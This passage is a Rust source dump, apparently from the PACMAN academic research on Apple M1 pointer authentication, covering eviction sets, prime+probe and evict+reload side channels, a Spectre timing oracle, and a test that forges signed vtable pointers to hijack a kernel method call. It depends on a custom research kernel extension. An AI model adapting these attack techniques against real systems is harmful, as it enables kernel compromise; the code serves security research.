167 | // 4. Record results with kernel timing oracle 168 | let latency = handle.kernel_exec_for_timing(spectre_ptr, true).unwrap(); 169 | times[cur_iter_idx] = latency; 170 | // let latency_limit = handle.kernel_read_for_timing(limit_va, true).unwrap(); 171 | // times[cur_iter_idx] = (latency, latency_limit); 172 | } 173 | 174 | // Make sure to do all printing *AFTER* the tests have completed! 175 | // println!("Reload latency is {} cycles", latency); 176 | print!("["); 177 | for idx in 0..NUM_INST_SPECTRE_KERNEL_TRIALS { 178 | print!("{},", times[idx]); 179 | } 180 | println!("]"); 181 | } 182 | -------------------------------------------------------------------------------- /src/evset.rs: -------------------------------------------------------------------------------- 1 | /*! 
2 | * Generate eviction sets for data / inst pointers 3 | */ 4 | 5 | use crate::*; 6 | use rand::prelude::SliceRandom; 7 | 8 | /// What stride do we take between virtual addresses to generate out evset candidates? 9 | /// If this is a large power of two multiple of page size, it will increase the likelihood of TLB conflicts. 10 | /// To eliminate TLB conflicts, make this a large power of 2 + 1 multiple of page size. 11 | pub const STRIDE : usize = 4096 * cache::PAGE_SIZE; 12 | 13 | pub const EVSET_SIZE_MAX : usize = 1024; 14 | 15 | /** 16 | * Create a data eviction set within a kernel memory region for a given physical address. 17 | * 18 | * `target_paddr` should be a physical address. 19 | * 20 | * # Arguments 21 | * * `target_vaddr`: The virtual address to create an eviction set for. 22 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 23 | * (can't just compute this as we don't know which address space the target vaddr comes from). 24 | * * `kernel_memory`: The kernel memory region to draw addresses from for the eviction set. 25 | * * `kernel_memory_size`: The size of `kernel_memory`. 26 | * 27 | * # Return Value 28 | * A vector of addresses within `kernel_memory` that will contend with `target_paddr`. 
29 | */ 30 | pub unsafe fn data_kpevset(target_vaddr: u64, target_paddr: u64, kernel_memory: u64, kernel_memory_size: usize) -> Vec { 31 | let handle = match PacmanKitConnection::init() { 32 | Some(v) => v, 33 | None => panic!("Couldn't connect to PacmanKit"), 34 | }; 35 | 36 | let mut vec = Vec::new(); 37 | let target_l2_set = cache::get_cache_set_m1(target_paddr); 38 | 39 | // Offset applies to virtual addresses 40 | let memory_region_addr = kernel_memory as usize; 41 | 42 | for i in (0..kernel_memory_size).step_by(128) { 43 | let idx = i; 44 | if idx > kernel_memory_size { 45 | println!("0x{:X}: Out of memory", idx); 46 | break; 47 | } 48 | 49 | let cur_va = kernel_memory + idx as u64; 50 | let cur_pa = handle.kernel_virt_to_phys(cur_va).unwrap(); 51 | // if cache::get_cache_set_m1(cur_va) == cache::get_cache_set_m1(target_vaddr) { 52 | if cache::get_cache_set_m1(cur_pa) == target_l2_set { 53 | vec.push(cur_va); 54 | } 55 | // } 56 | } 57 | 58 | let virt_set_index = cache::get_l1_cache_set_m1(target_vaddr); 59 | for i in &vec { 60 | if cache::get_l1_cache_set_m1(*i) != virt_set_index { 61 | panic!("Incongruent VAs"); 62 | } 63 | } 64 | 65 | return vec; 66 | } 67 | 68 | /** 69 | * Create a data eviction set within a memory region for a given physical address. 70 | * 71 | * `target_paddr` should be a physical address. 72 | * 73 | * # Arguments 74 | * * `target_vaddr`: The virtual address to create an eviction set for. 75 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 76 | * (can't just compute this as we don't know which address space the target vaddr comes from). 77 | * * `memory_region`: The region to draw addresses from for the eviction set. 78 | * 79 | * # Return Value 80 | * A vector of addresses within `memory_region` that will contend with `target_paddr`. 
81 | */ 82 | pub unsafe fn data_pevset(target_vaddr: u64, target_paddr: u64, memory_region: &mut [u8]) -> Vec { 83 | let handle = match PacmanKitConnection::init() { 84 | Some(v) => v, 85 | None => panic!("Couldn't connect to PacmanKit"), 86 | }; 87 | 88 | let mut vec = Vec::new(); 89 | let target_l2_set = cache::get_cache_set_m1(target_paddr); 90 | 91 | // Offset applies to virtual addresses 92 | let memory_region_addr = memory_region.as_ptr() as usize; 93 | let offset = (target_vaddr as usize) & cache::TLB_OFFSET_MASK; 94 | 95 | for i in (0..memory_region.len()).step_by(evset::STRIDE) { 96 | let idx = i + offset; 97 | if idx > memory_region.len() { break; } 98 | 99 | if vec.len() >= EVSET_SIZE_MAX { break; } 100 | 101 | let cur_va = &memory_region[idx] as *const u8 as u64; 102 | 103 | // Uncomment this to use physical translation: 104 | // For now we do NOT use physical translation as we don't need it 105 | // let cur_pa = handle.user_virt_to_phys(cur_va).unwrap(); 106 | // if cache::get_cache_set_m1(cur_pa) == target_l2_set { 107 | vec.push(cur_va); 108 | // } 109 | } 110 | 111 | let virt_set_index = cache::get_l1_cache_set_m1(target_vaddr); 112 | for i in &vec { 113 | if cache::get_l1_cache_set_m1(*i) != virt_set_index { 114 | // panic!("Incongruent VAs"); 115 | } 116 | } 117 | 118 | return vec; 119 | } 120 | 121 | /** 122 | * Create an instruction eviction set within a memory region for a given physical address. 123 | * 124 | * `target_paddr` should be a physical address. 125 | * 126 | * # Arguments 127 | * * `target_vaddr`: The virtual address to create an eviction set for. 128 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 129 | * (can't just compute this as we don't know which address space the target vaddr comes from). 130 | * 131 | * # Return Value 132 | * A vector of addresses within `memory_region` that will contend with `target_paddr`. 
133 | * 134 | * # Side Effects 135 | * Will make parts of memory_region executable, and fill them with instructions to execute. 136 | */ 137 | pub unsafe fn inst_pevset(target_vaddr: u64, target_paddr: u64, memory_region: &mut [u8]) -> Vec { 138 | let evset = data_pevset(target_vaddr, target_paddr, memory_region); 139 | 140 | for entry in &evset { 141 | let pg = core::slice::from_raw_parts_mut(*entry as *mut u8, cache::PAGE_SIZE); 142 | retpoline::mk_retpoline_page(pg).unwrap(); 143 | } 144 | 145 | return evset; 146 | } 147 | 148 | /** 149 | * Create an eviction set for a given data address within a memory region. 150 | * 151 | * `addr` may be contained within `memory_region`. 152 | * 153 | * # Arguments 154 | * * `addr`: The address to create an eviction set for. 155 | * * `memory_region`: A memory region to pick addresses from to create the eviction set. 156 | * 157 | * # Return Value 158 | * A vector of addresses within `memory_region`. 159 | */ 160 | pub fn data_evset(addr: *const u8, memory_region: &mut [u8]) -> Vec<*mut u8> { 161 | let mut vec = Vec::new(); 162 | let ptr = addr as u64; 163 | let memory_region_base = (&memory_region[0] as *const u8) as u64; 164 | 165 | for i in 0..L1D_WAYS { 166 | let offset = ((i + 1) * L1D_SETS * L1D_LINESIZE) << 2; 167 | 168 | if offset > memory_region.len() { 169 | panic!("Cannot create a data eviction set! Out of memory!"); 170 | } 171 | 172 | let new_evset_entry = memory_region_base + (offset as u64); 173 | vec.push(new_evset_entry as *mut u8); 174 | } 175 | 176 | vec.shuffle(&mut thread_rng()); 177 | 178 | return vec; 179 | } 180 | 181 | /** 182 | * Create an eviction set for a given instruction address within a memory region. 183 | * 184 | * `addr` may be contained within `memory_region`. 185 | * 186 | * Note: The regions are treated as instruction slices (not data slices) and hence 187 | * act as pointers to 32 bit values instead of 8 bit values. 
188 | * 189 | * # Arguments 190 | * * `addr`: The address to create an eviction set for. 191 | * * `memory_region`: A memory region to pick addresses from to create the eviction set. 192 | * 193 | * # Return Value 194 | * A vector of addresses within `memory_region`. 195 | */ 196 | pub fn inst_evset(addr: *const u32, memory_region: &mut [u32]) -> Vec<*mut u32> { 197 | let mut vec = Vec::new(); 198 | let ptr = addr as u64; 199 | let memory_region_base = (&memory_region[0] as *const u32) as u64; 200 | 201 | for i in 0..L1I_WAYS { 202 | let offset = (i + 1) * L1I_SETS * L1I_LINESIZE; 203 | 204 | if offset > memory_region.len() / 4 { 205 | panic!("Cannot create a data eviction set! Out of memory!"); 206 | } 207 | 208 | let new_evset_entry = memory_region_base + (offset as u64); 209 | vec.push(new_evset_entry as *mut u32); 210 | } 211 | 212 | vec.shuffle(&mut thread_rng()); 213 | 214 | return vec; 215 | } 216 | -------------------------------------------------------------------------------- /src/attacks/prime_probe.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Methods for implementing the actual prime+probe attacks. 3 | */ 4 | use crate::*; 5 | 6 | pub const DATA_EVSET_SIZE : usize = 21; 7 | pub const DATA_MISS_LATENCY : u64 = 40; 8 | 9 | /// How many times to repeat a given trial? 10 | pub const DATA_NUM_ITERS : usize = 50; 11 | 12 | /// How many trials to run? (Each trial == a different PAC) 13 | pub const DATA_NUM_TRIALS : usize = 1024; 14 | 15 | pub const INST_EVSET_SIZE : usize = 11; 16 | pub const INST_MISS_LATENCY : u64 = 40; 17 | 18 | /// How many times to repeat a given trial? 19 | pub const INST_NUM_ITERS : usize = 512; 20 | 21 | /// How many trials to run? (Each trial == a different PAC) 22 | pub const INST_NUM_TRIALS : usize = 32; 23 | 24 | /** 25 | * Data prime+probe 26 | * Begin by priming an eviction set, then do a load, and then 27 | * probe the eviction set, recording the number of misses. 
28 | */ 29 | pub unsafe fn data_prime_probe(mem_region: &mut [u8]) { 30 | // -1. Setup PacmanKit 31 | let handle = match PacmanKitConnection::init() { 32 | Some(v) => v, 33 | None => panic!("Couldn't connect to PacmanKit"), 34 | }; 35 | 36 | let mut kernel_mmap_va = match handle.kernel_mmap() { 37 | Ok(v) => v, 38 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 39 | }; 40 | 41 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 42 | 43 | // // 0. Pick a target 44 | // let target = Box::new(0x41414141u64); 45 | // let target_vaddr = &*target as *const _ as u64; 46 | 47 | // // Sanity check the addressing with Box 48 | // let outval : u64; 49 | // asm!{ 50 | // "ldr {outval}, [{ptr}]", 51 | // outval = out(reg) outval, 52 | // ptr = in(reg) target_vaddr, 53 | // } 54 | // println!("0x{:X} contains 0x{:X}",target_vaddr, outval); 55 | // let target_paddr = handle.user_virt_to_phys(target_vaddr).unwrap(); 56 | 57 | let target_vaddr = kernel_mmap_va; 58 | let target_paddr = kernel_mmap_pa; 59 | 60 | let mut results = [[0; DATA_NUM_ITERS]; DATA_NUM_TRIALS]; 61 | let evset = data_pevset(target_vaddr, target_paddr, mem_region); 62 | let chosen_vec : Vec = evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 63 | let indexes_vec : Vec = (0..chosen_vec.len()).collect(); 64 | 65 | // Copy from vector to array to minimize Rust overhead 66 | let mut chosen = [0u64; DATA_EVSET_SIZE]; 67 | let mut indexes = [0usize; DATA_EVSET_SIZE]; 68 | 69 | for i in 0..DATA_EVSET_SIZE { 70 | chosen[i] = chosen_vec[i]; 71 | indexes[i] = indexes_vec[i]; 72 | } 73 | 74 | // Initialize eviction set 75 | for entry in &evset { 76 | timer::time_access(*entry); 77 | } 78 | 79 | for entry in &chosen { 80 | timer::time_access(*entry); 81 | } 82 | 83 | // Decide which trials should load and which should not 84 | let mut do_loads = [false; DATA_NUM_TRIALS]; 85 | for i in 0..DATA_NUM_TRIALS { 86 | do_loads[i] = crandom::rand() 
% 2 == 0; 87 | } 88 | 89 | // Each trial tests a different PAC 90 | for trial in 0..DATA_NUM_TRIALS { 91 | let do_load = do_loads[trial]; 92 | 93 | // Number of misses each iteration 94 | let mut samples = [0; DATA_NUM_ITERS]; 95 | 96 | // Each iteration checks the same value multiple times 97 | for iteration in 0..DATA_NUM_ITERS { 98 | indexes.shuffle(&mut thread_rng()); 99 | 100 | // 1. Prime 101 | for _ in 0..12 { 102 | for i in 0..DATA_EVSET_SIZE { 103 | timer::time_access(chosen[indexes[i]]); 104 | } 105 | } 106 | 107 | // 2. Load(?) 108 | // if do_load { 109 | // timer::time_access(target_vaddr); 110 | // } 111 | handle.kernel_read_for_timing(target_vaddr, do_load).unwrap(); 112 | 113 | // 3. Probe 114 | let mut times = [0; DATA_EVSET_SIZE]; 115 | for i in (0..DATA_EVSET_SIZE).rev() { 116 | times[i] = timer::time_access(chosen[indexes[i]]); 117 | } 118 | 119 | let mut misses = 0; 120 | for i in 0..DATA_EVSET_SIZE { 121 | if times[i] > DATA_MISS_LATENCY { 122 | misses+=1; 123 | } 124 | } 125 | 126 | samples[iteration] = misses; 127 | // println!("{:?}", times); 128 | // println!("{} misses", misses); 129 | } 130 | 131 | results[trial] = samples; 132 | 133 | // println!("To evict: 0x{:X} => 0x{:X}", target_vaddr, target_paddr); 134 | 135 | // for i in 0..DATA_EVSET_SIZE { 136 | // println!("\t0x{:X} => 0x{:X}", chosen[indexes[i]], handle.user_virt_to_phys(chosen[indexes[i]]).unwrap()); 137 | // } 138 | } 139 | 140 | for i in 0..DATA_NUM_TRIALS { 141 | if do_loads[i] { 142 | print!("[*] "); 143 | } 144 | else { 145 | print!("[x] "); 146 | } 147 | results[i].sort(); 148 | let mut avg : u64 = 0; 149 | for j in 0..results[i].len() { 150 | avg += results[i][j]; 151 | } 152 | avg /= results[i].len() as u64; 153 | // println!("{:?}", results[i]); 154 | let median = results[i][results[i].len() / 2]; 155 | println!("{}, {}", median, avg); 156 | } 157 | } 158 | 159 | /** 160 | * Inst prime+probe 161 | * Begin by priming an eviction set, then do an exec, and then 162 | * 
probe the eviction set, recording the number of misses. 163 | */ 164 | pub unsafe fn inst_prime_probe(mem_region: &mut [u8]) { 165 | // -1. Setup PacmanKit 166 | let handle = match PacmanKitConnection::init() { 167 | Some(v) => v, 168 | None => panic!("Couldn't connect to PacmanKit"), 169 | }; 170 | 171 | // let mut kernel_method_va = handle.leak_method().unwrap(); 172 | let kernel_method_va = handle.get_kernel_base().unwrap() + attacks::pacman::INST_TARGET_OFFSET; 173 | 174 | let kernel_method_pa = handle.kernel_virt_to_phys(kernel_method_va).unwrap(); 175 | 176 | // // 0. Pick a target 177 | let target_vaddr = kernel_method_va; 178 | let target_paddr = kernel_method_pa; 179 | 180 | // let train_vaddr = handle.leak_retpoline().unwrap() | PAC_BITMASK; 181 | 182 | let mut results = [[0; INST_NUM_ITERS]; INST_NUM_TRIALS]; 183 | let evset = inst_pevset(target_vaddr, target_paddr, mem_region); 184 | let chosen_vec : Vec = evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 185 | let indexes_vec : Vec = (0..chosen_vec.len()).collect(); 186 | 187 | // Copy from vector to array to minimize Rust overhead 188 | let mut chosen = [0u64; INST_EVSET_SIZE]; 189 | let mut indexes = [0usize; INST_EVSET_SIZE]; 190 | 191 | for i in 0..INST_EVSET_SIZE { 192 | chosen[i] = chosen_vec[i]; 193 | indexes[i] = indexes_vec[i]; 194 | } 195 | 196 | // Initialize eviction set 197 | for entry in &evset { 198 | timer::time_exec(*entry); 199 | } 200 | 201 | for entry in &chosen { 202 | timer::time_exec(*entry); 203 | } 204 | 205 | // Decide which trials should load and which should not 206 | let mut do_loads = [false; INST_NUM_TRIALS]; 207 | for i in 0..INST_NUM_TRIALS { 208 | do_loads[i] = crandom::rand() % 2 == 0; 209 | } 210 | 211 | // Each trial tests a different PAC 212 | for trial in 0..INST_NUM_TRIALS { 213 | let do_load = do_loads[trial]; 214 | 215 | // Number of misses each iteration 216 | let mut samples = [0; INST_NUM_ITERS]; 217 | 218 | // 
Each iteration checks the same value multiple times 219 | for iteration in 0..INST_NUM_ITERS { 220 | indexes.shuffle(&mut thread_rng()); 221 | 222 | // BEGIN SPECTRE STUFF 223 | // for _ in 0..64 { 224 | // handle.kernel_exec_for_spectre(train_vaddr, 0).unwrap(); 225 | // } 226 | // END SPECTRE STUFF 227 | 228 | // 1. Prime 229 | for _ in 0..12 { 230 | for i in 0..INST_EVSET_SIZE { 231 | timer::time_exec(chosen[indexes[i]]); 232 | } 233 | } 234 | 235 | // 2. Call(?) 236 | // prime+probe only: 237 | // handle.kernel_exec_for_timing(target_vaddr, do_load).unwrap(); 238 | 239 | // Spectre: 240 | handle.kernel_exec_for_spectre(target_vaddr, if do_load {0x0} else {0x50}).unwrap(); 241 | 242 | // 3. Probe 243 | let mut times = [0; INST_EVSET_SIZE]; 244 | for i in (0..INST_EVSET_SIZE).rev() { 245 | times[i] = timer::time_exec(chosen[indexes[i]]); 246 | } 247 | 248 | let mut misses = 0; 249 | for i in 0..INST_EVSET_SIZE { 250 | if times[i] > INST_MISS_LATENCY { 251 | misses+=1; 252 | } 253 | } 254 | 255 | // println!("{:?}", times); 256 | samples[iteration] = misses; 257 | } 258 | 259 | results[trial] = samples; 260 | } 261 | 262 | for i in 0..INST_NUM_TRIALS { 263 | if do_loads[i] { 264 | print!("[*] "); 265 | } 266 | else { 267 | print!("[x] "); 268 | } 269 | results[i].sort(); 270 | let mut avg : u64 = 0; 271 | for j in 0..results[i].len() { 272 | avg += results[i][j]; 273 | } 274 | avg /= results[i].len() as u64; 275 | // println!("{:?}", results[i]); 276 | let median = results[i][results[i].len() / 2]; 277 | println!("{}, {}", median, avg); 278 | } 279 | } 280 | -------------------------------------------------------------------------------- /src/tests.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Test code to manually create eviction sets and confirm data/ instruction contention is visible. 3 | */ 4 | 5 | use crate::*; 6 | 7 | /** 8 | * Compare the different timers. 
9 | */ 10 | pub unsafe fn test_timers(shared_mem: &mut [u8]) { 11 | let mut x = 0; 12 | let t1_mach = gettime(); 13 | let t1 = read_volatile(&CTR); 14 | for i in 0..1000 { 15 | x = i / 2 + x; 16 | } 17 | let t2 = read_volatile(&CTR); 18 | let t2_mach = gettime(); 19 | println!("Time difference (thread): {}", t2 - t1); 20 | println!("Time difference (mach): {}", t2_mach - t1_mach); 21 | println!("{}", x); 22 | } 23 | 24 | /** 25 | * Demonstrate a data eviction set. 26 | */ 27 | pub unsafe fn data_ev_set_test(shared_mem: &mut [u8]) { 28 | if !set_core(CoreKind::PCORE) { 29 | println!("Error setting CPU affinity!"); 30 | return; 31 | } 32 | 33 | let evset = data_evset(&shared_mem[0], shared_mem); 34 | 35 | // Demonstrate eviction of shared_mem[0] 36 | println!("reading 0x{:X} twice", &shared_mem[0] as *const u8 as u64); 37 | let t0 = read_counter(); 38 | read_volatile(&shared_mem[0]); 39 | let t1 = read_counter(); 40 | read_volatile(&shared_mem[0]); 41 | let t2 = read_counter(); 42 | 43 | for evaddr in &evset { 44 | read_volatile(*evaddr); 45 | // println!("evicting 0x{:X}", *evaddr as *const u8 as u64); 46 | } 47 | 48 | println!("reading 0x{:X}", &shared_mem[0] as *const u8 as u64); 49 | let t1_2 = read_counter(); 50 | read_volatile(&shared_mem[0]); 51 | let t2_2 = read_counter(); 52 | 53 | println!("Time difference (uncached): {}", t1 - t0); 54 | println!("Time difference (cached): {}", t2 - t1); 55 | println!("Time difference (post-eviction): {}", t2_2 - t1_2); 56 | 57 | println!("========================="); 58 | // Now we show prime probe 59 | // prime 60 | for evaddr in &evset { 61 | read_volatile(*evaddr); 62 | } 63 | 64 | // evict(?) 
65 | // for _ in 0..1000{ 66 | // read_volatile(&shared_mem[0]); 67 | // } 68 | 69 | let mut results = [0u64; 0x10000]; 70 | let mut cur_idx : usize = 0; 71 | 72 | // probe 73 | for evaddr in &evset { 74 | asm!{"isb"} 75 | let t1_3 = read_counter(); 76 | read_volatile(*evaddr); 77 | let t2_3 = read_counter(); 78 | results[cur_idx] = t2_3 - t1_3; 79 | cur_idx+=1; 80 | } 81 | 82 | println!("prime+probe Results"); 83 | println!("[ ] == Empty, [X] == Cached"); 84 | let mut num_miss = 0; 85 | for idx in 0..evset.len() { 86 | if results[idx] >= 50 { 87 | println!("[ ] {}", results[idx]); 88 | num_miss+=1; 89 | } 90 | else { 91 | println!("[X] {}", results[idx]); 92 | } 93 | } 94 | println!("{} / {}", num_miss, evset.len()); 95 | } 96 | 97 | /** 98 | * Demonstrate an instruction eviction set. 99 | * DEPRECATED- mk_retpoline method has been removed for performance reasons. 100 | * (physical eviction sets explore far too many addresses to fill a retpoline region before choosing candidates). 101 | */ 102 | // pub unsafe fn inst_ev_set_test(shared_mem: &mut [u8]) { 103 | // let retpoline = match mk_retpoline(shared_mem) { 104 | // None => { 105 | // println!("Couldn't make a retpoline region!"); 106 | // return; 107 | // } 108 | 109 | // Some(x) => x 110 | // }; 111 | 112 | // println!("Retpoline is at 0x{:X}", &retpoline[0] as *const u32 as u64); 113 | // println!("Shared memory is at 0x{:X}", &shared_mem[0] as *const u8 as u64); 114 | // assert_eq!(&retpoline[0] as *const u32 as u64, &shared_mem[0] as *const u8 as u64); 115 | 116 | // let evset = inst_evset(&retpoline[0], retpoline); 117 | 118 | // let retpoline_fn : extern "C" fn() = core::mem::transmute(&retpoline[0]); 119 | 120 | // let t1 = read_counter(); 121 | // asm!{"isb"}; 122 | // retpoline_fn(); 123 | // asm!{"isb"}; 124 | // let t2 = read_counter(); 125 | // asm!{"isb"}; 126 | // retpoline_fn(); 127 | // asm!{"isb"}; 128 | // let t3 = read_counter(); 129 | 130 | // // for i in 1..=6 { 131 | // // let idx = ((19 
- i) * 32768) / core::mem::size_of::(); 132 | // // let retpoline_entry : extern "C" fn() = core::mem::transmute(&retpoline[idx]); 133 | // // retpoline_entry(); 134 | // // } 135 | 136 | // for evaddr in evset { 137 | // let retpoline_entry : extern "C" fn() = core::mem::transmute(evaddr); 138 | // asm!{"isb"}; 139 | // retpoline_entry(); 140 | // asm!{"isb"}; 141 | // } 142 | 143 | // let t1_2 = read_counter(); 144 | // asm!{"isb"}; 145 | // retpoline_fn(); 146 | // asm!{"isb"}; 147 | // let t2_2 = read_counter(); 148 | 149 | // println!("Uncached execution time: {}", t2 - t1); 150 | // println!("Cached execution time: {}", t3 - t2); 151 | // println!("Post eviction execution time: {}", t2_2 - t1_2); 152 | // } 153 | 154 | pub unsafe fn inst_pev_set_test(shared_mem: &mut [u8]) { 155 | let handle = match PacmanKitConnection::init() { 156 | Some(v) => v, 157 | None => panic!("Couldn't connect to PacmanKit"), 158 | }; 159 | 160 | let mut kernel_mmap_va = match handle.kernel_mmap() { 161 | Ok(v) => v, 162 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 163 | }; 164 | 165 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 166 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 167 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 168 | println!("Generating eviction set to match address with L2 set {}...", target_set); 169 | 170 | let evset = inst_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 171 | println!("Found {} conflicts.", evset.len()); 172 | 173 | println!("{:X?}", evset); 174 | 175 | let retpoline_fn : extern "C" fn() = core::mem::transmute(evset[0]); 176 | println!("Calling 0x{:X}", evset[0]); 177 | 178 | let t1 = read_counter(); 179 | asm!{"isb"}; 180 | retpoline_fn(); 181 | asm!{"isb"}; 182 | let t2 = read_counter(); 183 | asm!{"isb"}; 184 | retpoline_fn(); 185 | asm!{"isb"}; 186 | let t3 = read_counter(); 187 | 188 | for evaddr in evset { 189 | let retpoline_entry : 
extern "C" fn() = core::mem::transmute(evaddr); 190 | println!("Calling 0x{:X}", evaddr); 191 | asm!{"isb"}; 192 | retpoline_entry(); 193 | asm!{"isb"}; 194 | } 195 | 196 | let t1_2 = read_counter(); 197 | asm!{"isb"}; 198 | retpoline_fn(); 199 | asm!{"isb"}; 200 | let t2_2 = read_counter(); 201 | 202 | println!("Uncached execution time: {}", t2 - t1); 203 | println!("Cached execution time: {}", t3 - t2); 204 | println!("Post eviction execution time: {}", t2_2 - t1_2); 205 | } 206 | 207 | /** 208 | * Test the PacmanKitConnection methods. 209 | */ 210 | pub unsafe fn test_pacmankit() { 211 | let handle = PacmanKitConnection::init().unwrap(); 212 | let kernel_base = handle.get_kernel_base().unwrap(); 213 | println!("Kernel base is at 0x{:X}", kernel_base); 214 | println!("Kernel base contains 0x{:X}", handle.kernel_read(kernel_base).unwrap()); 215 | // handle.kernel_write(kernel_base, 0x4141414141414141).unwrap(); 216 | handle.kernel_write(kernel_base, 0x100000CFEEDFACF).unwrap(); 217 | println!("Kernel base contains 0x{:X}", handle.kernel_read(kernel_base).unwrap()); 218 | println!("Kernel base is at 0x{:X}", handle.kernel_virt_to_phys(kernel_base).unwrap()); 219 | let user_addr = (&handle as *const _) as u64; 220 | println!("User address 0x{:X} has physical address 0x{:X}", user_addr, handle.user_virt_to_phys(user_addr).unwrap()); 221 | println!("Handle is at 0x{:X}", handle.get_handle_loc().unwrap()); 222 | 223 | let cache_test_addr = 0x17F; 224 | println!("Offset is {}", get_cache_offset_m1(cache_test_addr)); 225 | println!("Set is 0x{:X}", get_cache_set_m1(cache_test_addr)); 226 | println!("Tag is 0x{:X}", get_cache_tag_m1(cache_test_addr)); 227 | 228 | let kern_mmap_ptr = match handle.kernel_mmap() { 229 | Ok(mmap_ptr) => mmap_ptr, 230 | Err(error) => panic!("Failed to allocate kernel memory!"), 231 | }; 232 | println!("Got a pointer at 0x{:X}", kern_mmap_ptr); 233 | 234 | handle.kernel_free().unwrap(); 235 | } 236 | 237 | /** 238 | * Test our ability to forge 
PACs given a PAC(addr, salt) oracle. 239 | ```text 240 | Overview of C++ vtable class signing: 241 | 242 | Let PacmanKitService be a C++ class where the PacmanUser : IOUserClient class 243 | has a public PacmanKitService member variable (not a pointer, just a regular member var). 244 | 245 | PacmanUser: 246 | +------------------+ 247 | | IOUserClient | 248 | +------------------+ 249 | | ... | 250 | | PacmanKitService:| 251 | | +-------------+ | PacmanKitService`vtable: 252 | | | vtable_ptr |--+-----> +--------------------+ 253 | | +-------------+ | | externalMethod_ptr | 254 | | ... | +--------------------+ 255 | +------------------+ 256 | 257 | The PACs can be computed using: 258 | vtable_ptr = PACDA(address = vtable, salt = object | 0xd986); 259 | externalMethod_ptr = PACIA(address = externalMethod, salt = (&vtable | 0xa7d5)) 260 | ``` 261 | */ 262 | pub unsafe fn test_forge_pacs() { 263 | // Handle is used for interfacing with PacmanKit 264 | let handle = PacmanKitConnection::init().unwrap(); 265 | 266 | // Victim handle gives us a victim IOUserClient to exploit 267 | let victim_handle = PacmanKitConnection::init().unwrap(); 268 | 269 | let iouserclient_base = victim_handle.get_handle_loc().unwrap(); 270 | let pacmankitservice = iouserclient_base + pacmankit::PACMANKIT_TO_HELPER; 271 | let pacmankitservice_vtable = handle.kernel_read(pacmankitservice).unwrap(); 272 | let pacmankitservice_vtable_masked = pacmankitservice_vtable | PAC_BITMASK; 273 | let pacmankitservice_externalMethod = handle.kernel_read(pacmankitservice_vtable).unwrap(); 274 | let pacmankitservice_externalMethod_masked = pacmankitservice_externalMethod | PAC_BITMASK; 275 | println!("IOService is at 0x{:X}", iouserclient_base); 276 | println!("PacmanKitService is at 0x{:X}", pacmankitservice); 277 | println!("PacmanKitService`vtable is at 0x{:X}", pacmankitservice_vtable_masked); 278 | println!("PacmanKitService`vtable signed is 0x{:X}", pacmankitservice_vtable); 279 | 
println!("PacmanKitService`externalMethod signed is 0x{:X}", pacmankitservice_externalMethod); 280 | 281 | let salt_data = get_salt(pacmankitservice | PAC_BITMASK, 0xd986); 282 | let salt_inst = get_salt(pacmankitservice_vtable | PAC_BITMASK, 0xa7d5); 283 | 284 | for _ in 0..1000 { 285 | let forged_vtable_ptr = handle.forge_sign_data(pacmankitservice_vtable_masked, salt_data).unwrap(); 286 | let forged_vtable_entry = handle.forge_sign_inst(pacmankitservice_externalMethod_masked, salt_inst).unwrap(); 287 | println!("Forge-signed vtable is 0x{:X}", forged_vtable_ptr); 288 | println!("Forge-signed externalMethod is 0x{:X}", forged_vtable_entry); 289 | assert_eq!(forged_vtable_ptr, pacmankitservice_vtable); 290 | assert_eq!(forged_vtable_entry, pacmankitservice_externalMethod); 291 | } 292 | 293 | let win_ptr = handle.leak_win().unwrap(); 294 | 295 | // Manually call win: 296 | // handle.kernel_exec_for_timing(win_ptr, true).unwrap(); 297 | 298 | // Forge vtable with mmap region and use that to call win: 299 | let kernel_mmap = handle.kernel_mmap().unwrap(); 300 | let salt_data = get_salt(pacmankitservice | PAC_BITMASK, 0xd986); 301 | let salt_inst = get_salt(kernel_mmap | PAC_BITMASK, 0xa7d5); 302 | let new_vtable_ptr = handle.forge_sign_data(kernel_mmap, salt_data).unwrap(); 303 | let new_vtable_entry = handle.forge_sign_inst(win_ptr, salt_inst).unwrap(); 304 | 305 | handle.kernel_write(kernel_mmap | PAC_BITMASK, new_vtable_entry).unwrap(); 306 | handle.kernel_write(pacmankitservice | PAC_BITMASK, new_vtable_ptr).unwrap(); 307 | 308 | // This should not be redirected... 309 | handle.call_service_routine(0, 1, 2, 3, 4, 5).unwrap(); 310 | 311 | // And this one should be redirected! 312 | victim_handle.call_service_routine(0, 1, 2, 3, 4, 5).unwrap(); 313 | } 314 | -------------------------------------------------------------------------------- /src/attacks/evict_reload.rs: -------------------------------------------------------------------------------- 1 | /*! 
2 | * Generate latency traces for graphing and precise timer metrics using evict+reload. 3 | */ 4 | use crate::*; 5 | use rand::thread_rng; 6 | use rand::prelude::SliceRandom; 7 | 8 | /// Number of different eviction set sizes to try (each trial == a different eviction size) 9 | pub const TRIALS : usize = 256; 10 | 11 | /// Number of times to try a random collection of addresses from the potential eviction set for a given size 12 | pub const NUM_RETRIALS : usize = 25; 13 | 14 | /// How many times to repeat a trial before reporting a latency 15 | pub const TRIAL_REPEAT : usize = 12; 16 | 17 | /** 18 | * Evict+Reload for data accesses. 19 | * 20 | * TLDR: 21 | * ``` 22 | * for num_test_addrs in range(TRIALS): 23 | * for retrial_idx in range(NUM_RETRIALS): 24 | * chosen = evset.sample(num_test_addrs) 25 | * 26 | * for cur_trial in range(TRIAL_REPEAT): 27 | * load test addr 28 | * load chosen set in random order 29 | * reload test addr 30 | * record reload latency 31 | * 32 | * print(average(reload latencies for a given trial size)) 33 | * ``` 34 | */ 35 | pub unsafe fn data_evict_reload(shared_mem: &mut [u8]) { 36 | let handle = match PacmanKitConnection::init() { 37 | Some(v) => v, 38 | None 